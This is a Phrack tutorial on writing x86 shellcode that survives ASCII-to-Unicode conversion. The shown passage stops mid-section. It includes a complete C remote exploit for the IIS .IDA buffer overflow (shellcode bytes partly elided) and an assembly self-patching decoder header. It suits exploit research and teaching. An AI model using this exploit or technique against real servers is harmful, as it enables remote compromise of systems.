1280 lines
46 KiB
Plaintext
1280 lines
46 KiB
Plaintext
==Phrack Inc.==
|
|
|
|
Volume 0x0b, Issue 0x3d, Phile #0x0b of 0x0f
|
|
|
|
|=------------=[ Building IA32 'Unicode-Proof' Shellcodes ]=-------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------=[ obscou <obscou@dr.com||wishkah@chek.com> ]=-------------=|
|
|
|
|
|
|
|
|
|
|
--[ Contents
|
|
|
|
0 - The Unicode Standard
|
|
|
|
1 - Introduction
|
|
|
|
2 - Our Instructions set
|
|
|
|
3 - Possibilities
|
|
|
|
4 - The Strategy
|
|
|
|
5 - Position of the code
|
|
|
|
6 - Conclusion
|
|
|
|
7 - Appendix : Code
|
|
|
|
|
|
--[ 0 - The Unicode Standard
|
|
|
|
While exploiting buffer overflows, we sometime face a difficulty :
|
|
character transformations. In fact, the exploited program may have modified
|
|
our buffer, by setting it to lower/upper case, or by getting rid of
|
|
non-alphanumeric characters, thus stopping the attack as our shellcode
|
|
usually can't run anymore. The transformation we are dealing here with is
|
|
the transformation of a C-type string (common zero terminated string) to a
|
|
Unicode string.
|
|
|
|
|
|
Here is a quick overview of what Unicode is (source : www.unicode.org)
|
|
|
|
|
|
"What is Unicode?
|
|
Unicode provides a unique number for every character,
|
|
no matter what the platform,
|
|
no matter what the program,
|
|
no matter what the language."
|
|
|
|
--- www.unicode.org
|
|
|
|
In fact, because Internet has become so popular, and because we all have
|
|
different languages and therefore different charaters, there is now a need
|
|
to have a standard so that computers can exchange data whatever the
|
|
program, platform, language, network etc...
|
|
Unicode is a 16-bits character set capable of encoding all known characters
|
|
and used as a worldwide character-encoding standard.
|
|
|
|
Today, Unicode is used by many industry leaders such as :
|
|
|
|
Apple
|
|
HP
|
|
IBM
|
|
Microsoft
|
|
Oracle
|
|
Sun
|
|
and many others...
|
|
|
|
The Unicode standard is requiered by softwares like :
|
|
(non exhaustive list, see unicode.org for full list)
|
|
|
|
Operating Systems :
|
|
|
|
Microsoft Windows CE, Windows NT, Windows 2000, and Windows XP
|
|
GNU/Linux with glibc 2.2.2 or newer - FAQ support
|
|
Apple Mac OS 9.2, Mac OS X 10.1, Mac OS X Server, ATSUI
|
|
Compaq's Tru64 UNIX, Open VMS
|
|
IBM AIX, AS/400, OS/2
|
|
SCO UnixWare 7.1.0
|
|
Sun Solaris
|
|
|
|
And of course, any software that runs under thoses systems...
|
|
|
|
http://www.unicode.org/charts/ : displays the Unicode table of caracters
|
|
It looks like this :
|
|
|
|
| Range | Character set
|
|
|-----------|--------------------
|
|
| 0000-007F | Basic Latin
|
|
| 0080-00FF | Latin-1 Supplement
|
|
| 0100-017F | Latin Extended-A
|
|
| [...] | [...]
|
|
| 0370-03FF | Greek and Coptic
|
|
| [...] | [...]
|
|
| 0590-05FF | Hebrew
|
|
| 0600-06FF | Arabic
|
|
| [...] | [...]
|
|
| 3040-309F | Japanese Hiragana
|
|
| 30A0-30FF | Japanese Katakana
|
|
|
|
|
|
.... and so on until everybody is happy !
|
|
|
|
Unicode 4.0 includes characters for :
|
|
|
|
Basic Latin Block Elements
|
|
Latin-1 Supplement Geometric Shapes
|
|
Latin Extended-A Miscellaneous Symbols
|
|
Latin Extended-B Dingbats
|
|
IPA Extensions Miscellaneous Math. Symbols-A
|
|
Spacing Modifier Letters Supplemental Arrows-A
|
|
Combining Diacritical Marks Braille Patterns
|
|
Greek Supplemental Arrows-B
|
|
Cyrillic Miscellaneous Mathematical Symbols-B
|
|
Cyrillic Supplement Supplemental Mathematical Operators
|
|
Armenian CJK Radicals Supplement
|
|
Hebrew Kangxi Radicals
|
|
Arabic Ideographic Description Characters
|
|
Syriac CJK Symbols and Punctuation
|
|
Thaana Hiragana
|
|
Devanagari Katakana
|
|
Bengali Bopomofo
|
|
Gurmukhi Hangul Compatibility Jamo
|
|
Gujarati Kanbun
|
|
Oriya Bopomofo Extended
|
|
Tamil Katakana Phonetic Extensions
|
|
Telugu Enclosed CJK Letters and Months
|
|
Kannada CJK Compatibility
|
|
Malayalam CJK Unified Ideographs Extension A
|
|
Sinhala Yijing Hexagram Symbols
|
|
Thai CJK Unified Ideographs
|
|
Lao Yi Syllables
|
|
Tibetan Yi Radicals
|
|
Myanmar Hangul Syllables
|
|
Georgian High Surrogates
|
|
Hangul Jamo Low Surrogates
|
|
Ethiopic Private Use Area
|
|
Cherokee CJK Compatibility Ideographs
|
|
Unified Canadian Aboriginal Syllabic Alphabetic Presentation Forms
|
|
Ogham Arabic Presentation Forms-A
|
|
Runic Variation Selectors
|
|
Tagalog Combining Half Marks
|
|
Hanunoo CJK Compatibility Forms
|
|
Buhid Small Form Variants
|
|
Tagbanwa Arabic Presentation Forms-B
|
|
Khmer Halfwidth and Fullwidth Forms
|
|
Mongolian Specials
|
|
Limbu Linear B Syllabary
|
|
Tai Le Linear B Ideograms
|
|
Khmer Symbols Aegean Numbers
|
|
Phonetic Extensions Old Italic
|
|
Latin Extended Additional Gothic
|
|
Greek Extended Deseret
|
|
General Punctuation Shavian
|
|
Superscripts and Subscripts Osmanya
|
|
Currency Symbols Cypriot Syllabary
|
|
Combining Marks for Symbols Byzantine Musical Symbols
|
|
Letterlike Symbols Musical Symbols
|
|
Number Forms Tai Xuan Jing Symbols
|
|
Arrows Mathematical Alphanumeric Symbols
|
|
Mathematical Operators CJK Unified Ideographs Extension B
|
|
Miscellaneous Technical CJK Compatibility Ideographs Supp.
|
|
Control Pictures Tags
|
|
Optical Character Recognition Variation Selectors Supplement
|
|
Enclosed Alphanumerics Supplementary Private Use Area-A
|
|
Box Drawing Supplementary Private Use Area-B
|
|
|
|
Yes it's impressive.
|
|
|
|
|
|
Microsoft says :
|
|
|
|
"Unicode is a worldwide character-encoding standard. Windows NT, Windows
|
|
2000, and Windows XP use it exclusively at the system level for character
|
|
and string manipulation. Unicode simplifies localization of software and
|
|
improves multilingual text processing. By implementing it in your
|
|
applications, you can enable the application with universal data exchange
|
|
capabilities for global marketing, using a single binary file for every
|
|
possible character code."
|
|
Wa have to notice that The Windows programming interface uses ANSI and
|
|
Unicode API's for each API, for example:
|
|
|
|
The API : MessageBox (displays a msgbox of course)
|
|
Is exported by User32.dll with :
|
|
MessageBoxA (ANSI)
|
|
MessageBoxW (Unicode)
|
|
|
|
MessageBoxA will accept a standard C-type string as an argument
|
|
MessageBoxW requieres Unicode strings as arguments.
|
|
|
|
According to Microsoft, internal use of strings is handled by the system
|
|
itself that ensures a transparent translation of strings between different
|
|
standards.
|
|
But if you want to use ANSI in a C program compiling under windows, you
|
|
just have to define UNICODE and every API will be replaced by its 'W'
|
|
version.
|
|
This sounds logical to me, let's get to the point now...
|
|
|
|
|
|
|
|
--[ 1 - Introduction
|
|
|
|
|
|
|
|
We will consider the following situation :
|
|
|
|
You send some data to a vulnerable server, and your data is considered as
|
|
ASCII (standard 8-bits character encoding), then your buffer is translated
|
|
into unicode for compatibility reasons, and then an overflow occurs with
|
|
your transformed buffer.
|
|
|
|
For example, such an input buffer :
|
|
4865 6C6C 6F20 576F 726C 6420 2100 0000 Hello World !...
|
|
0000 0000 0000 0000 0000 0000 0000 0000 ................
|
|
|
|
Would turn into :
|
|
4800 6500 6C00 6C00 6F00 2000 5700 6F00 H.e.l.l.o. .W.o.
|
|
7200 6C00 6400 2000 2100 0000 0000 0000 r.l.d. .!.......
|
|
|
|
Then bang, overflow (yeah i know my example is stupid)
|
|
|
|
Under Win32 plateforms, a process usually starts at 00401000, this makes
|
|
it possible to smash EIP with a return address that looks like :
|
|
|
|
????:00??00??
|
|
|
|
So even with such a transformation, exploitation is still possible.
|
|
It will be a lot harder to get a working shellcode.
|
|
One possibility is to stuff the stack with untranformed data than contains
|
|
the same shellcode many times, then do the overflow with the tranformed
|
|
buffer, and make it return to one of your numerous shellcodes.
|
|
Here we assume that this was impossible because all buffers are unicode.
|
|
Needless to say that our assembly code won't go through this safely.
|
|
So we need to find a way to build a shellcode that resists to such a
|
|
transformation. We need to find opcodes containing null bytes to build our
|
|
shellcode.
|
|
|
|
Here is an example, it is a bit old but it is an example of how we can
|
|
manage to get a shellcode executed even if our sent buffer is f**cked
|
|
(This exploit was working on my box, it runs against IIS www service) :
|
|
|
|
|
|
---------------- CUT HERE -------------------------------------------------
|
|
|
|
/*
|
|
IIS .IDA remote exploit
|
|
|
|
|
|
formatted return address : 0x00530053
|
|
IIS sticks our very large buffer at 0x0052....
|
|
We jump to the buffer and get to the point
|
|
|
|
|
|
by obscurer
|
|
*/
|
|
|
|
#include <windows.h>
|
|
#include <winsock.h>
|
|
#include <stdio.h>
|
|
|
|
void usage(char *a);
|
|
int wsa();
|
|
|
|
/* My Generic Win32 Shellcode */
|
|
unsigned char shellcode[]={
|
|
"\xEB\x68\x4B\x45\x52\x4E\x45\x4C\x13\x12\x20\x67\x4C\x4F\x42\x41"
|
|
"\x4C\x61\x4C\x4C\x4F\x43\x20\x7F\x4C\x43\x52\x45\x41\x54\x20\x7F"
|
|
[......]
|
|
[......]
|
|
[......]
|
|
"\x09\x05\x01\x01\x69\x01\x01\x01\x01\x57\xFE\x96\x11\x05\x01\x01"
|
|
"\x69\x01\x01\x01\x01\xFE\x96\x15\x05\x01\x01\x90\x90\x90\x90\x00"};
|
|
|
|
int main (int argc, char **argv)
|
|
{
|
|
|
|
int sock;
|
|
struct hostent *host;
|
|
struct sockaddr_in sin;
|
|
int index;
|
|
|
|
char *xploit;
|
|
char *longshell;
|
|
|
|
|
|
char retstring[250];
|
|
|
|
if(argc!=4&&argc!=5) usage(argv[0]);
|
|
|
|
|
|
if(wsa()==FALSE)
|
|
{
|
|
printf("Error : cannot initialize winsock\n");
|
|
exit(0);
|
|
}
|
|
|
|
|
|
int size=0;
|
|
|
|
if(argc==5)
|
|
size=atoi(argv[4]);
|
|
|
|
|
|
printf("Beginning Exploit building\n");
|
|
|
|
xploit=(char *)malloc(40000+size);
|
|
longshell=(char *)malloc(35000+size);
|
|
if(!xploit||!longshell)
|
|
{
|
|
printf("Error, not enough memory to build exploit\n");
|
|
return 0;
|
|
}
|
|
|
|
if(strlen(argv[3])>65)
|
|
{
|
|
printf("Error, URL too long to fit in the buffer\n");
|
|
return 0;
|
|
}
|
|
|
|
for(index=0;index<strlen(argv[3]);index++)
|
|
shellcode[index+139]=argv[3][index]^0x20;
|
|
|
|
memset(xploit,0,40000+size);
|
|
memset(longshell,0,35000+size);
|
|
memset (longshell, '\x41', 30000+size);
|
|
|
|
for(index=0;index<sizeof(shellcode);index++)
|
|
longshell[index+30000+size]=shellcode[index];
|
|
|
|
longshell[30000+sizeof(shellcode)+size]=0;
|
|
|
|
|
|
memset(retstring,'S',250);
|
|
|
|
sprintf(xploit,
|
|
"GET /NULL.ida?%s=x HTTP/1.1\nHost: localhost\nAlex: %s\n\n",
|
|
retstring,
|
|
longshell);
|
|
|
|
|
|
printf("Exploit build, connecting to %s:%d\n",argv[1],atoi(argv[2]));
|
|
|
|
sock=socket(AF_INET,SOCK_STREAM,0);
|
|
if(sock<0)
|
|
{
|
|
printf("Error : Couldn't create a socket\n");
|
|
return 0;
|
|
}
|
|
|
|
|
|
if ((inet_addr (argv[1]))==-1)
|
|
{
|
|
host = gethostbyname (argv[1]);
|
|
if (!host)
|
|
{
|
|
printf ("Error : Couldn't resolve host\n");
|
|
return 0;
|
|
}
|
|
memcpy((unsigned long *)&sin.sin_addr.S_un.S_addr,
|
|
(unsigned long *)host->h_addr,
|
|
sizeof(host->h_addr));
|
|
|
|
}
|
|
else sin.sin_addr.S_un.S_addr=inet_addr(argv[1]);
|
|
|
|
|
|
sin.sin_family=AF_INET;
|
|
sin.sin_port=htons(atoi(argv[2]));
|
|
|
|
index=connect(sock,(struct sockaddr *)&sin,sizeof(sin));
|
|
if (index==-1)
|
|
{
|
|
printf("Error : Couldn't connect to host\n");
|
|
return 0;
|
|
}
|
|
|
|
printf("Connected to host, sending shellcode\n");
|
|
|
|
index=send(sock,xploit,strlen(xploit),0);
|
|
if(index<1)
|
|
{
|
|
printf("Error : Couldn't send trough socket\n");
|
|
return 0;
|
|
}
|
|
|
|
printf("Done, waiting for an answer\n");
|
|
|
|
memset (xploit,0, 2000);
|
|
|
|
index=recv(sock,xploit,100,0);
|
|
if(index<0)
|
|
{
|
|
printf("Server crashed, if exploit didn't work,
|
|
increase buffer size by 10000\n");
|
|
exit(0);
|
|
}
|
|
|
|
|
|
printf("Exploit didn't seem to work, closing connection\n",xploit);
|
|
|
|
closesocket(sock);
|
|
|
|
printf("Done\n");
|
|
|
|
return 0;
|
|
}
|
|
---------------- CUT HERE -------------------------------------------------
|
|
|
|
|
|
In this example, the exploitation string had to be as follows :
|
|
|
|
"GET /NULL.ida?[BUFFER]=x HTTP/1.1\nHost: localhost\nAlex: [ANY]\n\n"
|
|
|
|
If [BUFFER] is big enough, EIP is smashed with what it contains.
|
|
But, i've noticed that [BUFFER] has been transformed into unicode when the
|
|
overflow occurs. But something interesting was that [ANY] was a clean
|
|
ASCII buffer, being mapped in memory at around : 00530000...
|
|
So i tried to set [BUFFER] to "SSSSSSSSSSSSS" (S = 0x53)
|
|
After the unicode transformation, it became :
|
|
|
|
...00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53 00 53...
|
|
|
|
The EIP was smashed with : 0x00530053, IIS returned on somewhere around
|
|
[ANY], where i had put a huge space of 0x41 = "A" (increments a register)
|
|
and then, at the end of [ANY], my shellcode.
|
|
And this worked. But if we have no clean buffer, we are unable to install
|
|
a shellcode somewhere in memory. We have to find another solution.
|
|
|
|
|
|
|
|
|
|
--[ 2 - Our Instructions set
|
|
|
|
|
|
|
|
We must keep in mind that we can't use absolute addresses for calls, jmp...
|
|
because we want our shellcode to be as portable as possible.
|
|
First, we have to know which opcodes can be used, and which can't be used
|
|
in order to find a strategy. As used in the Intel papers :
|
|
|
|
r32 refers to a 32 bits register (eax, esi, ebp...)
|
|
r8 refers to a 8 bits register (ah, bl, cl...)
|
|
|
|
|
|
|
|
- UNCONDITIONAL JUMPS (JMP)
|
|
|
|
JMP's possible opcodes are EB and E9 for relative jumps, we can't use them
|
|
as they must be followed by a byte (00 would mean a jump to the next
|
|
instruction which is fairly unuseful)
|
|
|
|
FF and EA are absolute jumps, these opcodes can't be followed by a 00,
|
|
except if we want to jump to a known address, which we won't do as this
|
|
would mean that our shellcode contains harcoded addresses.
|
|
|
|
|
|
|
|
- CONDITIONAL JUMPS (Jcc : JNE, JAE, JNE, JL, JZ, JNG, JNS...)
|
|
|
|
The syntaxe for far jumps can't be used as it needs 2 consecutives non null
|
|
bytes. the syntaxe for near jumps can't be used either because the opcode
|
|
must be followed by the distance to jump to, which won't be 00. Also,
|
|
JMP r32 is impossible.
|
|
|
|
|
|
|
|
- LOOPs (LOOP, LOOPcc : LOOPE, LOOPNZ..)
|
|
|
|
Same problem : E0, or E1, or E2 are LOOP opcodes, they must me followed by
|
|
the number of bytes to cross...
|
|
|
|
|
|
- REPEAT (REP, REPcc : REPNE, REPNZ, REP + string operation)
|
|
|
|
All this is impossible to do because thoses intructions all begin with a
|
|
two bytes opcode.
|
|
|
|
|
|
- CALLs
|
|
|
|
Only the relative call can be usefull :
|
|
E8 ?? ?? ?? ??
|
|
In our case, we must have :
|
|
E8 00 ?? 00 ?? (with each ?? != 00)
|
|
We can't use this as our call would be at least 01000000 bytes further...
|
|
Also, CALL r32 is impossible.
|
|
|
|
|
|
- SET BYTE ON CONDITION (SETcc)
|
|
|
|
This instruction needs 2 non nul bytes. (SETA is 0F 97 for example).
|
|
|
|
|
|
|
|
Hu oh... This is harder as it may seem... We can't do any test... Because
|
|
we can't do anything conditional ! Moreover, we can't move along our code :
|
|
no Jumps and no Calls are permitted, and no Loops nor Repeats can be done.
|
|
|
|
Then, what can we do ?
|
|
The fact that we have a lot of NULLS will allow a lot of operation on the
|
|
EAX register... Because when you use EAX, [EAX], AX, etc.. as operand,
|
|
it is often coded in Hex with a 00.
|
|
|
|
|
|
|
|
- SINGLE BYTE OPCODES
|
|
|
|
We can use any single byte opcode, this will give us any INC or DEC on any
|
|
register, XCHG and PUSH/POP are also possible, with registers as operands.
|
|
So we can do :
|
|
XCHG r32,r32
|
|
POP r32
|
|
PUSH r32
|
|
|
|
Not bad.
|
|
|
|
|
|
- MOV
|
|
________________________________________________________________
|
|
|8800 mov [eax],al |
|
|
|8900 mov [eax],eax |
|
|
|8A00 mov al,[eax] |
|
|
|8B00 mov eax,[eax] |
|
|
| |
|
|
|Quite unuseful. |
|
|
|________________________________________________________________|
|
|
|
|
________________________________________________________________
|
|
|A100??00?? mov eax,[0x??00??00] |
|
|
|A200??00?? mov [0x??00??00],al |
|
|
|A300??00?? mov [0x??00??00],eax |
|
|
| |
|
|
|These are unuseful to us. (We said no hardcoded addresses). |
|
|
|________________________________________________________________|
|
|
|
|
________________________________________________________________
|
|
|B_00 mov r8,0x0 |
|
|
|A4 movsb |
|
|
| |
|
|
|Maybe we can use these ones. |
|
|
|________________________________________________________________|
|
|
|
|
________________________________________________________________
|
|
|B_00??00?? mov r32,0x??00??00 |
|
|
|C600?? mov byte [eax],0x?? |
|
|
| |
|
|
|This might be interesting for patching memory. |
|
|
|________________________________________________________________|
|
|
|
|
|
|
|
|
- ADD
|
|
|
|
________________________________________________________________
|
|
|00__ add [r32], r8 |
|
|
| |
|
|
| Using any register as a pointer, we can add bytes in memory. |
|
|
| |
|
|
|00__ add r8,r8 |
|
|
| |
|
|
| Could be a way to modify a register. |
|
|
|________________________________________________________________|
|
|
|
|
|
|
- XOR
|
|
|
|
________________________________________________________________
|
|
|3500??00?? xor eax,0x??00??00 |
|
|
| |
|
|
| |
|
|
| Could be a way to modify the EAX register. |
|
|
|________________________________________________________________|
|
|
|
|
|
|
- PUSH
|
|
|
|
________________________________________________________________
|
|
|6A00 push dword 0x00000000 |
|
|
|6800??00?? push dword 0x??00??00 |
|
|
| |
|
|
| Only this can be made. |
|
|
|________________________________________________________________|
|
|
|
|
|
|
--[ 3 - Possibilities
|
|
|
|
|
|
First we have to get rid of a small detail : the fact that we have
|
|
such 0x00 in our code may requier caution because if you return from
|
|
smashed EIP to ADDR :
|
|
|
|
... ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ...
|
|
||
|
|
ADDR
|
|
|
|
The result may be completely different if you ret to ADDR or ADDR+1 !
|
|
But, we can use as 'NOP' instruction, instructions like :
|
|
|
|
________________________________________________________________
|
|
|0400 add al,0x0 |
|
|
|________________________________________________________________|
|
|
|
|
Because : 000400 is : add [2*eax],al, we can jump wherever we want, we
|
|
won't be bothered by the fact that we have to fall on a 0x00 or not.
|
|
|
|
But this need 2*eax to be a valid pointer.
|
|
We also have :
|
|
|
|
________________________________________________________________
|
|
|06 push es |
|
|
|0006 add [esi],al |
|
|
| |
|
|
|0F000F str [edi] |
|
|
|000F add [edi],cl |
|
|
| |
|
|
|2E002E add [cs:esi],ch |
|
|
|002E add [esi],ch |
|
|
| |
|
|
|2F das |
|
|
|002F add [edi],ch |
|
|
| |
|
|
|37 aaa |
|
|
|0037 add [edi],dh |
|
|
| ; .... etc etc... |
|
|
|________________________________________________________________|
|
|
|
|
We are just to be careful with this alignment problem.
|
|
|
|
Next, let's see what can be done :
|
|
|
|
XCHG, INC, DEC, PUSH, POP 32 bits registers can be done directly
|
|
|
|
We can set a register (r32) to 00000000 :
|
|
________________________________________________________________
|
|
|push dword 0x00000000 |
|
|
|pop r32 |
|
|
|________________________________________________________________|
|
|
|
|
Notice that anything that can be done with EAX can be done with any other
|
|
register thanxs to the XCHG intruction.
|
|
|
|
For example we can set any value to EDX with a 0x00 at second position :
|
|
(for example : 0x12005678):
|
|
________________________________________________________________
|
|
|mov edx,0x12005600 ; EDX = 0x12005600 |
|
|
|mov ecx,0xAA007800 |
|
|
|add dl,ch ; EDX = 0x12005678 |
|
|
|________________________________________________________________|
|
|
|
|
|
|
More difficult : we can set any value to EAX (for example), but we will
|
|
have to use a little trick with the stack :
|
|
|
|
________________________________________________________________
|
|
|mov eax,0xAA003400 ; EAX = 0xAA003400 |
|
|
|push eax |
|
|
|dec esp |
|
|
|pop eax ; EAX = 0x003400?? |
|
|
|add eax,0x12005600 ; EAX = 0x123456?? |
|
|
|mov al,0x0 ; EAX = 0x12345600 |
|
|
|mov ecx,0xAA007800 |
|
|
|add al,ch |
|
|
| ; finally : EAX = 0x12345678 |
|
|
|________________________________________________________________|
|
|
|
|
|
|
Importante note : we migth want to set some 0x00 too :
|
|
|
|
If we wanted a 0x00 instead of 0x12, then instead of adding 0x00120056 to
|
|
the register, we can simply add 0x56 to ah :
|
|
|
|
________________________________________________________________
|
|
|mov ecx,0xAA005600 |
|
|
|add ah,ch |
|
|
|________________________________________________________________|
|
|
|
|
If we wanted a 0x00 instead of 0x34, then we just need EAX = 0x00000000 to
|
|
begin with, instead of trying to set this 0x34 byte.
|
|
|
|
If we wanted a 0x00 instead of 0x56, then it is simple to substract 0x56 to
|
|
ah by adding 0x100 - 0x56 = 0xAA to it :
|
|
________________________________________________________________
|
|
| ; EAX = 0x123456?? |
|
|
|mov ecx,0xAA00AA00 |
|
|
|add ah,ch |
|
|
|________________________________________________________________|
|
|
|
|
If we wanted a 0x00 instead of the last byte, just give up the last line.
|
|
|
|
Maybe if you haven't thougth of this, remember you can jump to a given
|
|
location with (assuming the address is in EAX) :
|
|
________________________________________________________________
|
|
|50 push eax |
|
|
|C3 ret |
|
|
|________________________________________________________________|
|
|
|
|
You may use this in case of a desperate situation.
|
|
|
|
|
|
--[ 4 - The Strategy
|
|
|
|
|
|
|
|
It seems nearly impossible to get a working shellcode with such a small set
|
|
of opcodes... But it is not !
|
|
The idea is the following :
|
|
|
|
Given a working shellcode, we must get rid of the 00 between each byte.
|
|
We need a loop, so let's do a loop, assuming EAX points to our shellcode :
|
|
|
|
_Loop_code_:____________________________________________________
|
|
| ; eax points to our shellcode |
|
|
| ; ebx is 0x00000000 |
|
|
| ; ecx is 0x00000500 (for example) |
|
|
| |
|
|
| label: |
|
|
|43 inc ebx |
|
|
|8A1458 mov byte dl,[eax+2*ebx] |
|
|
|881418 mov byte [eax+ebx],dl |
|
|
|E2F7 loop label |
|
|
|________________________________________________________________|
|
|
|
|
Problem : not unicode. So let's turn it into unicode :
|
|
|
|
43 8A 14 58 88 14 18 E2 F7, would be :
|
|
43 00 14 00 88 00 18 00 F7
|
|
|
|
Then, considering the fact that we can write data at a location pointed by
|
|
EAX, it will be simple to tranform thoses 00 into their original values.
|
|
|
|
We just need to do this (we assume EAX points to our data) :
|
|
|
|
________________________________________________________________
|
|
|40 inc eax |
|
|
|40 inc eax |
|
|
|C60058 mov byte [eax],0x58 |
|
|
|________________________________________________________________|
|
|
|
|
Problem : still not unicode. So that 2 bytes like 0x40 follow, we need a
|
|
00 between the two... As 00 can't fit, we need something like : 00??00,
|
|
which won't interfere with our business, so :
|
|
|
|
add [ebp+0x0],al (0x004500)
|
|
|
|
will do fine. Finally we get :
|
|
|
|
________________________________________________________________
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C60058 mov byte [eax],0x58 |
|
|
|________________________________________________________________|
|
|
|
|
-> [40 00 45 00 40 00 45 00 C6 00 58] is nothing but a unicode string !
|
|
|
|
|
|
Before the loop, we must have some things done :
|
|
First we must set a proper counter, i propose to set ECX to 0x0500, this
|
|
will deal with a 1280 bytes shellcode (but feel free to change this).
|
|
->This is easy to do thanks to what we just noticed.
|
|
Then we must have EBX = 0x00000000, so that the loop works properly.
|
|
->It is also easy to do.
|
|
Finally we must have EAX pointing to our shellcode in order to take away
|
|
the nulls.
|
|
->This will be the harder part of the job, so we will see that later.
|
|
|
|
Assuming EAX points to our code, we can build a header that will clean the
|
|
code that follows it from nulls (we use add [ebp+0x0],al to align nulls) :
|
|
|
|
-> 1st part : we do EBX=0x00000000, and ECX=0x00000500 (approximative size
|
|
of buffer)
|
|
|
|
________________________________________________________________
|
|
|6A00 push dword 0x00000000 |
|
|
|6A00 push dword 0x00000000 |
|
|
|5D pop ebx |
|
|
|004500 add [ebp+0x0],al |
|
|
|59 pop ecx |
|
|
|004500 add [ebp+0x0],al |
|
|
|BA00050041 mov edx,0x41000500 |
|
|
|00F5 add ch,dh |
|
|
|________________________________________________________________|
|
|
|
|
-> 2nd part : The patching of the 'loop code' :
|
|
43 00 14 00 88 00 18 00 F7 has to be : 43 8A 14 58 88 14 18 E2 F7
|
|
So we need to patch 4 bytes exactly which is simple :
|
|
|
|
(N.B : using {add dword [eax],0x00??00??} takes more bytes so we will
|
|
use a single byte mov : {mov byte [eax],0x??} to do this)
|
|
|
|
________________________________________________________________
|
|
|mov byte [eax],0x8A |
|
|
|inc eax |
|
|
|inc eax |
|
|
|mov byte [eax],0x58 |
|
|
|inc eax |
|
|
|inc eax |
|
|
|mov byte [eax],0x14 |
|
|
|inc eax |
|
|
| ; one more inc to get EAX to the shellcode |
|
|
|________________________________________________________________|
|
|
|
|
Which does, with 'align' instruction {add [ebp+0x0],al} :
|
|
________________________________________________________________
|
|
|004500 add [ebp+0x0],al |
|
|
|C6008A mov byte [eax],0x8A ; 0x8A |
|
|
|004500 add [ebp+0x0],al |
|
|
| |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C60058 mov byte [eax],0x58 ; 0x58 |
|
|
|004500 add [ebp+0x0],al |
|
|
| |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C60014 mov byte [eax],0x14 ; 0x14 |
|
|
|004500 add [ebp+0x0],al |
|
|
| |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C600E2 mov byte [eax],0xE2 ; 0xE2 |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|________________________________________________________________|
|
|
|
|
This is good, we now have EAX that points to the end of the loop, that is
|
|
to say : the shellcode.
|
|
|
|
-> 3rd part : The loop code (stuffed with nulls of course)
|
|
________________________________________________________________
|
|
|43 db 0x43 |
|
|
|00 db 0x00 ; overwritten with 0x8A |
|
|
|14 db 0x14 |
|
|
|00 db 0x00 ; overwritten with 0x58 |
|
|
|88 db 0x88 |
|
|
|00 db 0x00 ; overwritten with 0x14 |
|
|
|18 db 0x18 |
|
|
|00 db 0x00 ; overwritten with 0xE2 |
|
|
|F7 db 0xF7 |
|
|
|________________________________________________________________|
|
|
|
|
Just after this should be placed the original working shellcode.
|
|
|
|
|
|
|
|
Let's count the size of this header : (nulls don't count of course)
|
|
|
|
1st part : 10 bytes
|
|
2nd part : 27 bytes
|
|
3rd part : 5 bytes
|
|
-------------------
|
|
Total : 42 bytes
|
|
|
|
I find this affordable, because i could manage to make a remote Win32
|
|
shellcode fit in around 450 bytes.
|
|
|
|
So, at the end, we made it : a shellcode that works after it has been
|
|
turn into a unicode string !
|
|
|
|
Is this really it ? No of course, we forgot something. I wrote that we
|
|
assumed that EAX was pointing on the exact first null byte of the loop
|
|
code. But in order to be honest with you, i will have to explain a way
|
|
to obtain this.
|
|
|
|
|
|
--[ 5 - Captain, we don't know our position !
|
|
|
|
|
|
The problem is simple : We had to perform patches on memory to get our loop
|
|
working well. So we need to know our position in memory because we are
|
|
patching ourself.
|
|
In an assembly program, an easy way to do this would be :
|
|
|
|
________________________________________________________________
|
|
|call label |
|
|
| |
|
|
| label: |
|
|
|pop eax |
|
|
|________________________________________________________________|
|
|
|
|
Will get the absolute memory address of label in EAX.
|
|
|
|
In a classic shellcode we will need to do a call to a lower address
|
|
to avoid null bytes :
|
|
|
|
________________________________________________________________
|
|
|jmp jump_label |
|
|
| |
|
|
| call_label: |
|
|
|pop eax |
|
|
|push eax |
|
|
|ret |
|
|
| jump_label: |
|
|
|call call_label |
|
|
| ; **** |
|
|
|________________________________________________________________|
|
|
|
|
Will get the absolute memory address of '****'
|
|
|
|
But this is impossible in our case because we can't jump nor call.
|
|
Moreover, we can't parse memory looking for a signature of any kind.
|
|
I'm sure there must be other ways to do this but i could only 3 :
|
|
|
|
|
|
-> 1st idea : we are lucky.
|
|
|
|
If we are lucky, we can expect to have some registers pointing to a place
|
|
near our evil code. In fact, this will happen in 90% of time. This place
|
|
can't be considered as harcoded because it will surely move if the process
|
|
memory moves, from a machine to another. (The program, before it crashed,
|
|
must have used your data and so it must have pointers to it)
|
|
We know we can add anything to eax (only eax)
|
|
so we can :
|
|
|
|
- use XCHG to have the approximate address in EAX
|
|
- then add a value to EAX, thus moving it to wherever we want.
|
|
|
|
The problem is that we can't use : add al,r8 or and ah,r8, because don't
|
|
forget that :
|
|
EAX=0x000000FF + add al,1 = EAX=0x00000000
|
|
So thoses manipulations will do different things depending on what EAX
|
|
contains.
|
|
|
|
So all we have is : add eax,0x??00??00
|
|
No problem, we can add 0x1200 (for example) to EAX with :
|
|
|
|
________________________________________________________________
|
|
|0500110001 add eax,0x01001100 |
|
|
|05000100FF add eax,0xFF000100 |
|
|
|________________________________________________________________|
|
|
|
|
Then, it is simple to add some align data so that EAX points on what we
|
|
want.
|
|
For example :
|
|
________________________________________________________________
|
|
|0400 add al,0x0 |
|
|
|________________________________________________________________|
|
|
|
|
would be perfect for align.
|
|
(N.B: we will maybe need a little inc EAX to fit)
|
|
|
|
Some extra space may be requiered by this methode (max : 128 bytes because
|
|
we can only get EAX to point to the nearest address modulus 0x100, then we
|
|
have to add align bytes. As each 2 bytes is in fact 1 buffer byte because
|
|
